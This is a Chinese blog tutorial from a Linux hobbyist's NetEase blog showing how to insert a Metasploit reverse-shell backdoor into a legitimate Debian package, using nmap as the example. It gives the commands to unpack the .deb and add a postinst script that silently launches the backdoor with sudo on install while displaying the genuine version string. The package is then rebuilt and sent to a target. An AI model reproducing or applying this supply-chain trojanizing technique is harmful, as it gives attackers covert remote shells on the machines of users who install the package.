注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 

日志

 
 

Deb安装包中添加后门程序  

2014-01-12 15:12:03|  分类: Metasploit |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
这里我们以一个shell反弹后门做演示吧;这个后门程序的制作及使用过程本博以前《Metasploit使用后门渗透Ubuntu12.04》中介绍过,有兴趣可以参考下,在此不再赘述。

下载要添加后门的deb包 (如这里的 nmap-**.deb) :
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
  • dpkg -x xx.deb xxx           #把xx.deb解包到xxx文件夹
  • 在xxx目录新建DEBIAN(必须大写)文件夹
  • touch control postinst          #在DEBIAN文件夹新建control和postinst文件
  • nano control             #写入软件包的信息,比较重要,如果有错误可能导致无法安装,所以建议直接复制原软件包中       control文件所有内容
  • 复制后门程序到解包文件夹下 /usr/bin 目录里
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
  • nano postinst          #这个是安装软件是执行的脚本,这个也是我们后门程序运行的关键,内容可参考如下:
  • #!/bin/sh
    sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序,如这里backdoor
    sudo /usr/bin/xxx -V #安装后显示软件版本信息,这里参数可能不太一样,也可以自定义执行的参数

  • chmod 555 postinst                #postinst的执行权限为>=555且=<775

  • dpkg-deb --build xxx/ xxx.deb               #检查一遍没有问题就可以打包了
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
本机开始监听,软件发送到目标客户端执行。。。
成功:
Deb安装包中添加后门程序 - xiao106347 - Linux 折腾笔记
 
视频:
清晰版视频:http://pan.baidu.com/s/1pJAqKUf
在线观看:

转载请注明出处:http://xiao106347.blog.163.com/blog/static/215992078201401223746744/
  评论这张
 
阅读(3520)| 评论(2)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016